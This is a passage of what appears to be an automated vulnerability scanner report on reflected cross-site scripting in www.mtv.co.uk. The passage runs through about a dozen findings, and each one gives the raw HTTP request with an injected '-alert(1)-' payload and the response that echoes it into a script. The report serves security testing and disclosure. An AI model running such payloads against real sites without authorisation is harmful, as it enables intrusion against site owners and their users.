The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c3f"-alert(1)-"6b0f5865cdd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:46 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13464
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:46 GMT
Date: Mon, 12 Sep 2011 12:50:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
orting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttrib
...[SNIP]...

2.93. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb0b9"-alert(1)-"f96d614e794 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13465
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:53 GMT
Date: Mon, 12 Sep 2011 12:50:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.94. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e2a2"-alert(1)-"6efac768962 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files4e2a2"-alert(1)-"6efac768962/favicon.ico HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:48 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:48 GMT
Date: Mon, 12 Sep 2011 12:50:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files4e2a2"-alert(1)-"6efac768962/favicon.ico");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
...[SNIP]...

2.95. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeecc"-alert(1)-"a82a271c334 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/favicon.icoaeecc"-alert(1)-"a82a271c334 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:50:55 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13403
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:50:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:50:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files/favicon.icoaeecc"-alert(1)-"a82a271c334");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.96. http://www.mtv.co.uk/misc/thickbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /misc/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d548"-alert(1)-"85713fad3dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/9d548"-alert(1)-"85713fad3dc?1234890360 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13383
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/misc/9d548"-alert(1)-"85713fad3dc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.97. http://www.mtv.co.uk/modules/node/node.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1113"-alert(1)-"742e68c81f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/node/b1113"-alert(1)-"742e68c81f7?1234890364 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:52 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13395
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:52 GMT
Date: Mon, 12 Sep 2011 12:49:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/node/b1113"-alert(1)-"742e68c81f7");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.98. http://www.mtv.co.uk/modules/system/defaults.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bfa3"-alert(1)-"b3ed22fa9a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/4bfa3"-alert(1)-"b3ed22fa9a2?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:51 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13399
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:51 GMT
Date: Mon, 12 Sep 2011 12:49:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/4bfa3"-alert(1)-"b3ed22fa9a2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.99. http://www.mtv.co.uk/modules/system/system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18ade"-alert(1)-"c57ecfadbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/18ade"-alert(1)-"c57ecfadbe?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/18ade"-alert(1)-"c57ecfadbe");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.100. http://www.mtv.co.uk/modules/user/user.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dce4"-alert(1)-"99564bbadd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/user/9dce4"-alert(1)-"99564bbadd4?1234890366 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13398
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/user/9dce4"-alert(1)-"99564bbadd4");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.101. http://www.mtv.co.uk/sites/all/modules/cck/content.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/cck/content.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c31"-alert(1)-"2f891d8457f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f?1234890340 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13413
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:53 GMT
Date: Mon, 12 Sep 2011 12:49:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.102. http://www.mtv.co.uk/sites/all/modules/fckeditor/fckeditor.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 326da"-alert(1)-"6d091b0c1cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc?1234890357 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:54 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13423
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:55 GMT
Date: Mon, 12 Sep 2011 12:49:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.103. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd3bd"-alert(1)-"d480e12847b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:52 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13447
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:52 GMT
Date: Mon, 12 Sep 2011 12:50:52 GMT
Connection: close

